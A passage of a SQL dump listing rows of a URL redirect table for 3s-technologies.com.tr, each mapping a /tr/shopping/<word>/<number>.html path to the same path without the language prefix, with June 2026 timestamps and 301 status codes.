00:00:00',301),(69205,'https://3s-technologies.com.tr/tr/shopping/hypoxis/3324893059.html',NULL,'https://3s-technologies.com.tr/shopping/hypoxis/3324893059.html','',1,0,'2026-06-11 00:56:00','0000-00-00 00:00:00',301),(69206,'https://3s-technologies.com.tr/tr/shopping/tobeat/219728.html',NULL,'https://3s-technologies.com.tr/shopping/tobeat/219728.html','',1,0,'2026-06-11 00:56:03','0000-00-00 00:00:00',301),(69207,'https://3s-technologies.com.tr/tr/shopping/leucoryx/2773146469.html',NULL,'https://3s-technologies.com.tr/shopping/leucoryx/2773146469.html','',1,0,'2026-06-11 00:56:11','0000-00-00 00:00:00',301),(69208,'https://3s-technologies.com.tr/tr/shopping/loudful/878055909.html',NULL,'https://3s-technologies.com.tr/shopping/loudful/878055909.html','',1,0,'2026-06-11 00:56:14','0000-00-00 00:00:00',301),(69209,'https://3s-technologies.com.tr/tr/shopping/maxilliform/3718748605.html',NULL,'https://3s-technologies.com.tr/shopping/maxilliform/3718748605.html','',1,0,'2026-06-11 00:56:17','0000-00-00 00:00:00',301),(69210,'https://3s-technologies.com.tr/tr/shopping/catholicism/916798010.html',NULL,'https://3s-technologies.com.tr/shopping/catholicism/916798010.html','',1,0,'2026-06-11 00:56:20','0000-00-00 00:00:00',301),(69211,'https://3s-technologies.com.tr/tr/shopping/slowing/2716526128.html',NULL,'https://3s-technologies.com.tr/shopping/slowing/2716526128.html','',1,0,'2026-06-11 00:56:27','0000-00-00 00:00:00',301),(69212,'https://3s-technologies.com.tr/tr/shopping/indistinctness/343154741.html',NULL,'https://3s-technologies.com.tr/shopping/indistinctness/343154741.html','',1,0,'2026-06-11 00:56:31','0000-00-00 00:00:00',301),(69213,'https://3s-technologies.com.tr/tr/shopping/hippocamp/1441913154.html',NULL,'https://3s-technologies.com.tr/shopping/hippocamp/1441913154.html','',1,0,'2026-06-11 00:56:34','0000-00-00 00:00:00',301),(69214,'https://3s-technologies.com.tr/tr/shopping/affixes/302417731.html',NULL,'https://3s-technologies.com.tr/shopping/affixes/302417731.html','',1,0,'2026-06-11 00:56:37','0000-00-00 00:00:00',301),(69215,'https://3s-technologies.com.tr/tr/shopping/indevote/4219136781.html',NULL,'https://3s-technologies.com.tr/shopping/indevote/4219136781.html','',1,0,'2026-06-11 00:56:40','0000-00-00 00:00:00',301),(69216,'https://3s-technologies.com.tr/tr/shopping/brattishing/697182169.html',NULL,'https://3s-technologies.com.tr/shopping/brattishing/697182169.html','',1,0,'2026-06-11 00:56:43','0000-00-00 00:00:00',301),(69217,'https://3s-technologies.com.tr/tr/shopping/hemerocallis/2934766347.html',NULL,'https://3s-technologies.com.tr/shopping/hemerocallis/2934766347.html','',1,0,'2026-06-11 00:56:46','0000-00-00 00:00:00',301),(69218,'https://3s-technologies.com.tr/tr/shopping/methanogen/1469938518.html',NULL,'https://3s-technologies.com.tr/shopping/methanogen/1469938518.html','',1,0,'2026-06-11 00:56:49','0000-00-00 00:00:00',301),(69219,'https://3s-technologies.com.tr/tr/shopping/engraff/1530131484.html',NULL,'https://3s-technologies.com.tr/shopping/engraff/1530131484.html','',1,0,'2026-06-11 00:56:52','0000-00-00 00:00:00',301),(69220,'https://3s-technologies.com.tr/tr/shopping/whitebreasted/667502276.html',NULL,'https://3s-technologies.com.tr/shopping/whitebreasted/667502276.html','',1,0,'2026-06-11 00:56:55','0000-00-00 00:00:00',301),(69221,'https://3s-technologies.com.tr/tr/shopping/hoazin/1362693635.html',NULL,'https://3s-technologies.com.tr/shopping/hoazin/1362693635.html','',1,0,'2026-06-11 00:56:58','0000-00-00 00:00:00',301),(69222,'https://3s-technologies.com.tr/tr/shopping/overmalapert/3834197020.html',NULL,'https://3s-technologies.com.tr/shopping/overmalapert/3834197020.html','',1,0,'2026-06-11 00:57:01','0000-00-00 00:00:00',301),(69223,'https://3s-technologies.com.tr/tr/shopping/sintoc/3758517729.html',NULL,'https://3s-technologies.com.tr/shopping/sintoc/3758517729.html','',1,0,'2026-06-11 00:57:04','0000-00-00 00:00:00',301),(69224,'https://3s-technologies.com.tr/tr/shopping/ailuroidea/3231695191.html',NULL,'https://3s-technologies.com.tr/shopping/ailuroidea/3231695191.html','',1,0,'2026-06-11 00:57:07','0000-00-00 00:00:00',301),(69225,'https://3s-technologies.com.tr/tr/shopping/tropical/1990792687.html',NULL,'https://3s-technologies.com.tr/shopping/tropical/1990792687.html','',1,0,'2026-06-11 00:57:10','0000-00-00 00:00:00',301),(69226,'https://3s-technologies.com.tr/tr/shopping/unriddle/2218120707.html',NULL,'https://3s-technologies.com.tr/shopping/unriddle/2218120707.html','',1,0,'2026-06-11 00:57:13','0000-00-00 00:00:00',301),(69227,'https://3s-technologies.com.tr/tr/shopping/sanitary/2651555784.html',NULL,'https://3s-technologies.com.tr/shopping/sanitary/2651555784.html','',1,0,'2026-06-11 00:57:16','0000-00-00 00:00:00',301),(69228,'https://3s-technologies.com.tr/tr/shopping/pulsive/3716324391.html',NULL,'https://3s-technologies.com.tr/shopping/pulsive/3716324391.html','',1,0,'2026-06-11 00:57:19','0000-00-00 00:00:00',301),(69229,'https://3s-technologies.com.tr/tr/shopping/archpriest/2844009761.html',NULL,'https://3s-technologies.com.tr/shopping/archpriest/2844009761.html','',1,0,'2026-06-11 00:57:22','0000-00-00 00:00:00',301),(69230,'https://3s-technologies.com.tr/tr/shopping/stepbrother/4258238561.html',NULL,'https://3s-technologies.com.tr/shopping/stepbrother/4258238561.html','',1,0,'2026-06-11 00:57:25','0000-00-00 00:00:00',301),(69231,'https://3s-technologies.com.tr/tr/shopping/matfelon/79535300.html',NULL,'https://3s-technologies.com.tr/shopping/matfelon/79535300.html','',1,0,'2026-06-11 00:57:28','0000-00-00 00:00:00',301),(69232,'https://3s-technologies.com.tr/tr/shopping/cravatted/2558240788.html',NULL,'https://3s-technologies.com.tr/shopping/cravatted/2558240788.html','',1,0,'2026-06-11 00:57:31','0000-00-00 00:00:00',301),(69233,'https://3s-technologies.com.tr/tr/shopping/concubinate/4195325536.html',NULL,'https://3s-technologies.com.tr/shopping/concubinate/4195325536.html','',1,0,'2026-06-11 00:57:34','0000-00-00 00:00:00',301),(69234,'https://3s-technologies.com.tr/tr/shopping/conclusiveness/3667717989.html',NULL,'https://3s-technologies.com.tr/shopping/conclusiveness/3667717989.html','',1,0,'2026-06-11 00:57:37','0000-00-00 00:00:00',301),(69235,'https://3s-technologies.com.tr/tr/shopping/needily/1942154891.html',NULL,'https://3s-technologies.com.tr/shopping/needily/1942154891.html','',1,0,'2026-06-11 00:57:40','0000-00-00 00:00:00',301),(69236,'https://3s-technologies.com.tr/tr/shopping/rhinoplastic/3010331580.html',NULL,'https://3s-technologies.com.tr/shopping/rhinoplastic/3010331580.html','',1,0,'2026-06-11 00:57:43','0000-00-00 00:00:00',301),(69237,'https://3s-technologies.com.tr/tr/shopping/henhearted/594247199.html',NULL,'https://3s-technologies.com.tr/shopping/henhearted/594247199.html','',1,0,'2026-06-11 00:57:51','0000-00-00 00:00:00',301),(69238,'https://3s-technologies.com.tr/tr/shopping/bathyergus/2438067876.html',NULL,'https://3s-technologies.com.tr/shopping/bathyergus/2438067876.html','',1,0,'2026-06-11 00:57:52','0000-00-00 00:00:00',301),(69239,'https://3s-technologies.com.tr/tr/shopping/whisky/1662327804.html',NULL,'https://3s-technologies.com.tr/shopping/whisky/1662327804.html','',1,0,'2026-06-11 00:57:55','0000-00-00 00:00:00',301),(69240,'https://3s-technologies.com.tr/tr/shopping/trebleness/187928594.html',NULL,'https://3s-technologies.com.tr/shopping/trebleness/187928594.html','',1,0,'2026-06-11 00:57:58','0000-00-00 00:00:00',301),(69241,'https://3s-technologies.com.tr/tr/shopping/sleepy/2513747183.html',NULL,'https://3s-technologies.com.tr/shopping/sleepy/2513747183.html','',1,0,'2026-06-11 00:58:01','0000-00-00 00:00:00',301),(69242,'https://3s-technologies.com.tr/tr/shopping/westwardly/2099692067.html',NULL,'https://3s-technologies.com.tr/shopping/westwardly/2099692067.html','',1,0,'2026-06-11 00:58:04','0000-00-00 00:00:00',301),(69243,'https://3s-technologies.com.tr/tr/shopping/vaunting/1525379157.html',NULL,'https://3s-technologies.com.tr/shopping/vaunting/1525379157.html','',1,0,'2026-06-11 00:58:07','0000-00-00 00:00:00',301),(69244,'https://3s-technologies.com.tr/tr/shopping/ammon/2175660534.html',NULL,'https://3s-technologies.com.tr/shopping/ammon/2175660534.html','',1,0,'2026-06-11 00:58:10','0000-00-00 00:00:00',301),(69245,'https://3s-technologies.com.tr/tr/shopping/pedantize/1773651382.html',NULL,'https://3s-technologies.com.tr/shopping/pedantize/1773651382.html','',1,0,'2026-06-11 00:58:14','0000-00-00 00:00:00',301),(69246,'https://3s-technologies.com.tr/tr/shopping/cinchonic/745606768.html',NULL,'https://3s-technologies.com.tr/shopping/cinchonic/745606768.html','',1,0,'2026-06-11 00:58:16','0000-00-00 00:00:00',301),(69247,'https://3s-technologies.com.tr/tr/shopping/creosaurus/633512486.html',NULL,'https://3s-technologies.com.tr/shopping/creosaurus/633512486.html','',1,0,'2026-06-11 00:58:20','0000-00-00 00:00:00',301),(69248,'https://3s-technologies.com.tr/tr/shopping/amornings/2061492424.html',NULL,'https://3s-technologies.com.tr/shopping/amornings/2061492424.html','',1,0,'2026-06-11 00:58:22','0000-00-00 00:00:00',301),(69249,'https://3s-technologies.com.tr/tr/shopping/rutic/1499781950.html',NULL,'https://3s-technologies.com.tr/shopping/rutic/1499781950.html','',1,0,'2026-06-11 00:58:26','0000-00-00 00:00:00',301),(69250,'https://3s-technologies.com.tr/tr/shopping/orthoscopic/2052201695.html',NULL,'https://3s-technologies.com.tr/shopping/orthoscopic/2052201695.html','',1,0,'2026-06-11 00:58:29','0000-00-00 00:00:00',301),(69251,'https://3s-technologies.com.tr/tr/shopping/footworn/2365992501.html',NULL,'https://3s-technologies.com.tr/shopping/footworn/2365992501.html','',1,0,'2026-06-11 00:58:32','0000-00-00 00:00:00',301),(69252,'https://3s-technologies.com.tr/tr/shopping/furrow/399597238.html',NULL,'https://3s-technologies.com.tr/shopping/furrow/399597238.html','',1,0,'2026-06-11 00:58:35','0000-00-00 00:00:00',301),(69253,'https://3s-technologies.com.tr/tr/shopping/khutbah/439502071.html',NULL,'https://3s-technologies.com.tr/shopping/khutbah/439502071.html','',1,0,'2026-06-11 00:58:38','0000-00-00 00:00:00',301),(69254,'https://3s-technologies.com.tr/tr/shopping/arched/4006336794.html',NULL,'https://3s-technologies.com.tr/shopping/arched/4006336794.html','',1,0,'2026-06-11 00:58:41','0000-00-00 00:00:00',301),(69255,'https://3s-technologies.com.tr/tr/shopping/fokus/522474999.html',NULL,'https://3s-technologies.com.tr/shopping/fokus/522474999.html','',1,0,'2026-06-11 00:58:44','0000-00-00 00:00:00',301),(69256,'https://3s-technologies.com.tr/tr/shopping/whiggery/1817440798.html',NULL,'https://3s-technologies.com.tr/shopping/whiggery/1817440798.html','',1,0,'2026-06-11 00:58:46','0000-00-00 00:00:00',301),(69257,'https://3s-technologies.com.tr/tr/shopping/frustum/2095103295.html',NULL,'https://3s-technologies.com.tr/shopping/frustum/2095103295.html','',1,0,'2026-06-11 00:58:50','0000-00-00 00:00:00',301),(69258,'https://3s-technologies.com.tr/tr/shopping/highandmighty/3445951572.html',NULL,'https://3s-technologies.com.tr/shopping/highandmighty/3445951572.html','',1,0,'2026-06-11 00:58:53','0000-00-00 00:00:00',301),(69259,'https://3s-technologies.com.tr/tr/shopping/homoeopathically/1630485520.html',NULL,'https://3s-technologies.com.tr/shopping/homoeopathically/1630485520.html','',1,0,'2026-06-11 00:59:00','0000-00-00 00:00:00',301),(69260,'https://3s-technologies.com.tr/tr/shopping/gleed/2574988693.html',NULL,'https://3s-technologies.com.tr/shopping/gleed/2574988693.html','',1,0,'2026-06-11 00:59:02','0000-00-00 00:00:00',301),(69261,'https://3s-technologies.com.tr/tr/shopping/twirepipe/2427234043.html',NULL,'https://3s-technologies.com.tr/shopping/twirepipe/2427234043.html','',1,0,'2026-06-11 00:59:05','0000-00-00 00:00:00',301),(69262,'https://3s-technologies.com.tr/tr/shopping/rackrent/1037693000.html',NULL,'https://3s-technologies.com.tr/shopping/rackrent/1037693000.html','',1,0,'2026-06-11 00:59:08','0000-00-00 00:00:00',301),(69263,'https://3s-technologies.com.tr/tr/shopping/beauteous/1805330159.html',NULL,'https://3s-technologies.com.tr/shopping/beauteous/1805330159.html','',1,0,'2026-06-11 00:59:11','0000-00-00 00:00:00',301),(69264,'https://3s-technologies.com.tr/tr/shopping/motorboat/21556405.html',NULL,'https://3s-technologies.com.tr/shopping/motorboat/21556405.html','',1,0,'2026-06-11 00:59:14','0000-00-00 00:00:00',301),(69265,'https://3s-technologies.com.tr/tr/shopping/scarves/2073538372.html',NULL,'https://3s-technologies.com.tr/shopping/scarves/2073538372.html','',1,0,'2026-06-11 00:59:17','0000-00-00 00:00:00',301),(69266,'https://3s-technologies.com.tr/tr/shopping/thrill/546886193.html',NULL,'https://3s-technologies.com.tr/shopping/thrill/546886193.html','',1,0,'2026-06-11 00:59:20','0000-00-00 00:00:00',301),(69267,'https://3s-technologies.com.tr/tr/shopping/thrilled/1663539903.html',NULL,'https://3s-technologies.com.tr/shopping/thrilled/1663539903.html','',1,0,'2026-06-11 00:59:23','0000-00-00 00:00:00',301),(69268,'https://3s-technologies.com.tr/tr/shopping/sistrum/3729090673.html',NULL,'https://3s-technologies.com.tr/shopping/sistrum/3729090673.html','',1,0,'2026-06-11 00:59:31','0000-00-00 00:00:00',301),(69269,'https://3s-technologies.com.tr/tr/shopping/khanate/1655034151.html',NULL,'https://3s-technologies.com.tr/shopping/khanate/1655034151.html','',1,0,'2026-06-11 00:59:38','0000-00-00 00:00:00',301),(69270,'https://3s-technologies.com.tr/tr/shopping/elephansy/3887095346.html',NULL,'https://3s-technologies.com.tr/shopping/elephansy/3887095346.html','',1,0,'2026-06-11 00:59:43','0000-00-00 00:00:00',301),(69271,'https://3s-technologies.com.tr/tr/shopping/pisciculture/1883271096.html',NULL,'https://3s-technologies.com.tr/shopping/pisciculture/1883271096.html','',1,0,'2026-06-11 00:59:46','0000-00-00 00:00:00',301),(69272,'https://3s-technologies.com.tr/tr/shopping/egregious/1093273323.html',NULL,'https://3s-technologies.com.tr/shopping/egregious/1093273323.html','',1,0,'2026-06-11 00:59:49','0000-00-00 00:00:00',301),(69273,'https://3s-technologies.com.tr/tr/shopping/vasum/1284817389.html',NULL,'https://3s-technologies.com.tr/shopping/vasum/1284817389.html','',1,0,'2026-06-11 00:59:52','0000-00-00 00:00:00',301),(69274,'https://3s-technologies.com.tr/tr/shopping/wampum/617976680.html',NULL,'https://3s-technologies.com.tr/shopping/wampum/617976680.html','',1,0,'2026-06-11 00:59:55','0000-00-00 00:00:00',301),(69275,'https://3s-technologies.com.tr/tr/shopping/transcorporate/1025810591.html',NULL,'https://3s-technologies.com.tr/shopping/transcorporate/1025810591.html','',1,0,'2026-06-11 00:59:58','0000-00-00 00:00:00',301),(69276,'https://3s-technologies.com.tr/tr/shopping/perulae/2451505998.html',NULL,'https://3s-technologies.com.tr/shopping/perulae/2451505998.html','',1,0,'2026-06-11 01:00:01','0000-00-00 00:00:00',301),(69277,'https://3s-technologies.com.tr/tr/shopping/actiniopteris/999116637.html',NULL,'https://3s-technologies.com.tr/shopping/actiniopteris/999116637.html','',1,0,'2026-06-11 01:00:04','0000-00-00 00:00:00',301),(69278,'https://3s-technologies.com.tr/tr/shopping/erinacea/1310301427.html',NULL,'https://3s-technologies.com.tr/shopping/erinacea/1310301427.html','',1,0,'2026-06-11 01:00:07','0000-00-00 00:00:00',301),(69279,'https://3s-technologies.com.tr/tr/shopping/unshaped/149186493.html',NULL,'https://3s-technologies.com.tr/shopping/unshaped/149186493.html','',1,0,'2026-06-11 01:00:10','0000-00-00 00:00:00',301),(69280,'https://3s-technologies.com.tr/tr/shopping/acrocomia/1414612035.html',NULL,'https://3s-technologies.com.tr/shopping/acrocomia/1414612035.html','',1,0,'2026-06-11 01:00:13','0000-00-00 00:00:00',301),(69281,'https://3s-technologies.com.tr/tr/shopping/homomorphous/2988994871.html',NULL,'https://3s-technologies.com.tr/shopping/homomorphous/2988994871.html','',1,0,'2026-06-11 01:00:16','0000-00-00 00:00:00',301),(69282,'https://3s-technologies.com.tr/tr/shopping/alkali/909504373.html',NULL,'https://3s-technologies.com.tr/shopping/alkali/909504373.html','',1,0,'2026-06-11 01:00:19','0000-00-00 00:00:00',301),(69283,'https://3s-technologies.com.tr/tr/shopping/fainter/1825519428.html',NULL,'https://3s-technologies.com.tr/shopping/fainter/1825519428.html','',1,0,'2026-06-11 01:00:22','0000-00-00 00:00:00',301),(69284,'https://3s-technologies.com.tr/tr/shopping/supparasite/3084962279.html',NULL,'https://3s-technologies.com.tr/shopping/supparasite/3084962279.html','',1,0,'2026-06-11 01:00:25','0000-00-00 00:00:00',301),(69285,'https://3s-technologies.com.tr/tr/shopping/unpossibility/3971281360.html',NULL,'https://3s-technologies.com.tr/shopping/unpossibility/3971281360.html','',1,0,'2026-06-11 01:00:28','0000-00-00 00:00:00',301),(69286,'https://3s-technologies.com.tr/tr/shopping/italicize/1383588901.html',NULL,'https://3s-technologies.com.tr/shopping/italicize/1383588901.html','',1,0,'2026-06-11 01:00:31','0000-00-00 00:00:00',301),(69287,'https://3s-technologies.com.tr/tr/shopping/emeritus/3663964564.html',NULL,'https://3s-technologies.com.tr/shopping/emeritus/3663964564.html','',1,0,'2026-06-11 01:00:34','0000-00-00 00:00:00',301),(69288,'https://3s-technologies.com.tr/tr/shopping/farmyard/1853591203.html',NULL,'https://3s-technologies.com.tr/shopping/farmyard/1853591203.html','',1,0,'2026-06-11 01:00:37','0000-00-00 00:00:00',301),(69289,'https://3s-technologies.com.tr/tr/shopping/browdyng/4158843787.html',NULL,'https://3s-technologies.com.tr/shopping/browdyng/4158843787.html','',1,0,'2026-06-11 01:00:40','0000-00-00 00:00:00',301),(69290,'https://3s-technologies.com.tr/tr/shopping/hummingale/2468417426.html',NULL,'https://3s-technologies.com.tr/shopping/hummingale/2468417426.html','',1,0,'2026-06-11 01:00:47','0000-00-00 00:00:00',301),(69291,'https://3s-technologies.com.tr/tr/shopping/insisture/1731925541.html',NULL,'https://3s-technologies.com.tr/shopping/insisture/1731925541.html','',1,0,'2026-06-11 01:00:49','0000-00-00 00:00:00',301),(69292,'https://3s-technologies.com.tr/tr/shopping/waspishness/255478869.html',NULL,'https://3s-technologies.com.tr/shopping/waspishness/255478869.html','',1,0,'2026-06-11 01:00:53','0000-00-00 00:00:00',301),(69293,'https://3s-technologies.com.tr/tr/shopping/malmsey/3269338362.html',NULL,'https://3s-technologies.com.tr/shopping/malmsey/3269338362.html','',1,0,'2026-06-11 01:00:55','0000-00-00 00:00:00',301),(69294,'https://3s-technologies.com.tr/tr/shopping/phonetist/4251372014.html',NULL,'https://3s-technologies.com.tr/shopping/phonetist/4251372014.html','',1,0,'2026-06-11 01:00:58','0000-00-00 00:00:00',301),(69295,'https://3s-technologies.com.tr/tr/shopping/aspected/1512548200.html',NULL,'https://3s-technologies.com.tr/shopping/aspected/1512548200.html','',1,0,'2026-06-11 01:01:01','0000-00-00 00:00:00',301),(69296,'https://3s-technologies.com.tr/tr/shopping/osteopathist/2197767915.html',NULL,'https://3s-technologies.com.tr/shopping/osteopathist/2197767915.html','',1,0,'2026-06-11 01:01:04','0000-00-00 00:00:00',301),(69297,'https://3s-technologies.com.tr/tr/shopping/unquestioned/2977440720.html',NULL,'https://3s-technologies.com.tr/shopping/unquestioned/2977440720.html','',1,0,'2026-06-11 01:01:07','0000-00-00 00:00:00',301),(69298,'https://3s-technologies.com.tr/tr/shopping/baccata/1431359940.html',NULL,'https://3s-technologies.com.tr/shopping/baccata/1431359940.html','',1,0,'2026-06-11 01:01:10','0000-00-00 00:00:00',301),(69299,'https://3s-technologies.com.tr/tr/shopping/karvel/2072326289.html',NULL,'https://3s-technologies.com.tr/shopping/karvel/2072326289.html','',1,0,'2026-06-11 01:01:13','0000-00-00 00:00:00',301),(69300,'https://3s-technologies.com.tr/tr/shopping/hemitropal/3144043174.html',NULL,'https://3s-technologies.com.tr/shopping/hemitropal/3144043174.html','',1,0,'2026-06-11 01:01:16','0000-00-00 00:00:00',301),(69301,'https://3s-technologies.com.tr/tr/shopping/amidases/3122706497.html',NULL,'https://3s-technologies.com.tr/shopping/amidases/3122706497.html','',1,0,'2026-06-11 01:01:19','0000-00-00 00:00:00',301),(69302,'https://3s-technologies.com.tr/tr/shopping/pulicene/2607929907.html',NULL,'https://3s-technologies.com.tr/shopping/pulicene/2607929907.html','',1,0,'2026-06-11 01:01:22','0000-00-00 00:00:00',301),(69303,'https://3s-technologies.com.tr/tr/shopping/roxburghii/3284760999.html',NULL,'https://3s-technologies.com.tr/shopping/roxburghii/3284760999.html','',1,0,'2026-06-11 01:01:25','0000-00-00 00:00:00',301),(69304,'https://3s-technologies.com.tr/tr/shopping/jackanapes/3524715650.html',NULL,'https://3s-technologies.com.tr/shopping/jackanapes/3524715650.html','',1,0,'2026-06-11 01:01:29','0000-00-00 00:00:00',301),(69305,'https://3s-technologies.com.tr/tr/shopping/stamen/635823531.html',NULL,'https://3s-technologies.com.tr/shopping/stamen/635823531.html','',1,0,'2026-06-11 01:01:31','0000-00-00 00:00:00',301),(69306,'https://3s-technologies.com.tr/tr/shopping/olefiant/3187832590.html',NULL,'https://3s-technologies.com.tr/shopping/olefiant/3187832590.html','',1,0,'2026-06-11 01:01:35','0000-00-00 00:00:00',301),(69307,'https://3s-technologies.com.tr/tr/shopping/pentecosty/2540443320.html',NULL,'https://3s-technologies.com.tr/shopping/pentecosty/2540443320.html','',1,0,'2026-06-11 01:01:37','0000-00-00 00:00:00',301),(69308,'https://3s-technologies.com.tr/tr/shopping/miner/3539970789.html',NULL,'https://3s-technologies.com.tr/shopping/miner/3539970789.html','',1,0,'2026-06-11 01:01:45','0000-00-00 00:00:00',301),(69309,'https://3s-technologies.com.tr/tr/shopping/vegetationis/4120365237.html',NULL,'https://3s-technologies.com.tr/shopping/vegetationis/4120365237.html','',1,0,'2026-06-11 01:01:49','0000-00-00 00:00:00',301),(69310,'https://3s-technologies.com.tr/tr/shopping/freelancerfrelanser/3239152367.html',NULL,'https://3s-technologies.com.tr/shopping/freelancerfrelanser/3239152367.html','',1,0,'2026-06-11 01:01:52','0000-00-00 00:00:00',301),(69311,'https://3s-technologies.com.tr/tr/shopping/acarpous/3438921518.html',NULL,'https://3s-technologies.com.tr/shopping/acarpous/3438921518.html','',1,0,'2026-06-11 01:01:55','0000-00-00 00:00:00',301),(69312,'https://3s-technologies.com.tr/tr/shopping/relaxing/1130803325.html',NULL,'https://3s-technologies.com.tr/shopping/relaxing/1130803325.html','',1,0,'2026-06-11 01:01:58','0000-00-00 00:00:00',301),(69313,'https://3s-technologies.com.tr/tr/shopping/elaphurus/1944579089.html',NULL,'https://3s-technologies.com.tr/shopping/elaphurus/1944579089.html','',1,0,'2026-06-11 01:02:01','0000-00-00 00:00:00',301),(69314,'https://3s-technologies.com.tr/tr/shopping/furzeling/2901988656.html',NULL,'https://3s-technologies.com.tr/shopping/furzeling/2901988656.html','',1,0,'2026-06-11 01:02:04','0000-00-00 00:00:00',301),(69315,'https://3s-technologies.com.tr/tr/shopping/stonebow/3295919163.html',NULL,'https://3s-technologies.com.tr/shopping/stonebow/3295919163.html','',1,0,'2026-06-11 01:02:07','0000-00-00 00:00:00',301),(69316,'https://3s-technologies.com.tr/tr/shopping/shuck/1135505282.html',NULL,'https://3s-technologies.com.tr/shopping/shuck/1135505282.html','',1,0,'2026-06-11 01:02:10','0000-00-00 00:00:00',301),(69317,'https://3s-technologies.com.tr/tr/shopping/furfurous/4294816056.html',NULL,'https://3s-technologies.com.tr/shopping/furfurous/4294816056.html','',1,0,'2026-06-11 01:02:13','0000-00-00 00:00:00',301),(69318,'https://3s-technologies.com.tr/tr/shopping/apricot/771532233.html',NULL,'https://3s-technologies.com.tr/shopping/apricot/771532233.html','',1,0,'2026-06-11 01:02:16','0000-00-00 00:00:00',301),(69319,'https://3s-technologies.com.tr/tr/shopping/archangel/198712073.html',NULL,'https://3s-technologies.com.tr/shopping/archangel/198712073.html','',1,0,'2026-06-11 01:02:19','0000-00-00 00:00:00',301),(69320,'https://3s-technologies.com.tr/tr/shopping/fizzed/2499423460.html',NULL,'https://3s-technologies.com.tr/shopping/fizzed/2499423460.html','',1,0,'2026-06-11 01:02:22','0000-00-00 00:00:00',301),(69321,'https://3s-technologies.com.tr/tr/shopping/lathshaped/3432957092.html',NULL,'https://3s-technologies.com.tr/shopping/lathshaped/3432957092.html','',1,0,'2026-06-11 01:02:25','0000-00-00 00:00:00',301),(69322,'https://3s-technologies.com.tr/tr/shopping/diverticular/2196555800.html',NULL,'https://3s-technologies.com.tr/shopping/diverticular/2196555800.html','',1,0,'2026-06-11 01:02:28','0000-00-00 00:00:00',301),(69323,'https://3s-technologies.com.tr/tr/shopping/portcrayon/3767971997.html',NULL,'https://3s-technologies.com.tr/shopping/portcrayon/3767971997.html','',1,0,'2026-06-11 01:02:31','0000-00-00 00:00:00',301),(69324,'https://3s-technologies.com.tr/tr/shopping/macrorhiza/3372436871.html',NULL,'https://3s-technologies.com.tr/shopping/macrorhiza/3372436871.html','',1,0,'2026-06-11 01:02:34','0000-00-00 00:00:00',301),(69325,'https://3s-technologies.com.tr/tr/shopping/gorgonean/1677582959.html',NULL,'https://3s-technologies.com.tr/shopping/gorgonean/1677582959.html','',1,0,'2026-06-11 01:02:37','0000-00-00 00:00:00',301),(69326,'https://3s-technologies.com.tr/tr/shopping/semiannular/2949090038.html',NULL,'https://3s-technologies.com.tr/shopping/semiannular/2949090038.html','',1,0,'2026-06-11 01:02:40','0000-00-00 00:00:00',301),(69327,'https://3s-technologies.com.tr/tr/shopping/bistred/2069621440.html',NULL,'https://3s-technologies.com.tr/shopping/bistred/2069621440.html','',1,0,'2026-06-11 01:02:43','0000-00-00 00:00:00',301),(69328,'https://3s-technologies.com.tr/tr/shopping/conjunctivitis/1577297557.html',NULL,'https://3s-technologies.com.tr/shopping/conjunctivitis/1577297557.html','',1,0,'2026-06-11 01:02:46','0000-00-00 00:00:00',301),(69329,'https://3s-technologies.com.tr/tr/shopping/kremnitz/2385935292.html',NULL,'https://3s-technologies.com.tr/shopping/kremnitz/2385935292.html','',1,0,'2026-06-11 01:02:49','0000-00-00 00:00:00',301),(69330,'https://3s-technologies.com.tr/tr/shopping/judiciary/1843529786.html',NULL,'https://3s-technologies.com.tr/shopping/judiciary/1843529786.html','',1,0,'2026-06-11 01:02:52','0000-00-00 00:00:00',301),(69331,'https://3s-technologies.com.tr/tr/shopping/handcraft/1514712790.html',NULL,'https://3s-technologies.com.tr/shopping/handcraft/1514712790.html','',1,0,'2026-06-11 01:02:55','0000-00-00 00:00:00',301),(69332,'https://3s-technologies.com.tr/tr/shopping/tersest/508004853.html',NULL,'https://3s-technologies.com.tr/shopping/tersest/508004853.html','',1,0,'2026-06-11 01:02:58','0000-00-00 00:00:00',301),(69333,'https://3s-technologies.com.tr/tr/shopping/thenal/54216968.html',NULL,'https://3s-technologies.com.tr/shopping/thenal/54216968.html','',1,0,'2026-06-11 01:03:01','0000-00-00 00:00:00',301),(69334,'https://3s-technologies.com.tr/tr/shopping/counternatural/1603386577.html',NULL,'https://3s-technologies.com.tr/shopping/counternatural/1603386577.html','',1,0,'2026-06-11 01:03:09','0000-00-00 00:00:00',301),(69335,'https://3s-technologies.com.tr/tr/shopping/presidial/930841066.html',NULL,'https://3s-technologies.com.tr/shopping/presidial/930841066.html','',1,0,'2026-06-11 01:03:14','0000-00-00 00:00:00',301),(69336,'https://3s-technologies.com.tr/tr/shopping/papuan/151351083.html',NULL,'https://3s-technologies.com.tr/shopping/papuan/151351083.html','',1,0,'2026-06-11 01:03:17','0000-00-00 00:00:00',301),(69337,'https://3s-technologies.com.tr/tr/shopping/spondias/861243329.html',NULL,'https://3s-technologies.com.tr/shopping/spondias/861243329.html','',1,0,'2026-06-11 01:03:20','0000-00-00 00:00:00',301),(69338,'https://3s-technologies.com.tr/tr/shopping/pleurosigma/2826309349.html',NULL,'https://3s-technologies.com.tr/shopping/pleurosigma/2826309349.html','',1,0,'2026-06-11 01:03:23','0000-00-00 00:00:00',301),(69339,'https://3s-technologies.com.tr/tr/shopping/retailment/3191092135.html',NULL,'https://3s-technologies.com.tr/shopping/retailment/3191092135.html','',1,0,'2026-06-11 01:03:26','0000-00-00 00:00:00',301),(69340,'https://3s-technologies.com.tr/tr/shopping/fanatical/3991405954.html',NULL,'https://3s-technologies.com.tr/shopping/fanatical/3991405954.html','',1,0,'2026-06-11 01:03:29','0000-00-00 00:00:00',301),(69341,'https://3s-technologies.com.tr/tr/shopping/carbonarius/2947760827.html',NULL,'https://3s-technologies.com.tr/shopping/carbonarius/2947760827.html','',1,0,'2026-06-11 01:03:32','0000-00-00 00:00:00',301),(69342,'https://3s-technologies.com.tr/tr/shopping/sirenize/3150909721.html',NULL,'https://3s-technologies.com.tr/shopping/sirenize/3150909721.html','',1,0,'2026-06-11 01:03:35','0000-00-00 00:00:00',301),(69343,'https://3s-technologies.com.tr/tr/shopping/saponifiable/685299760.html',NULL,'https://3s-technologies.com.tr/shopping/saponifiable/685299760.html','',1,0,'2026-06-11 01:03:38','0000-00-00 00:00:00',301),(69344,'https://3s-technologies.com.tr/tr/shopping/suberites/2309108593.html',NULL,'https://3s-technologies.com.tr/shopping/suberites/2309108593.html','',1,0,'2026-06-11 01:03:40','0000-00-00 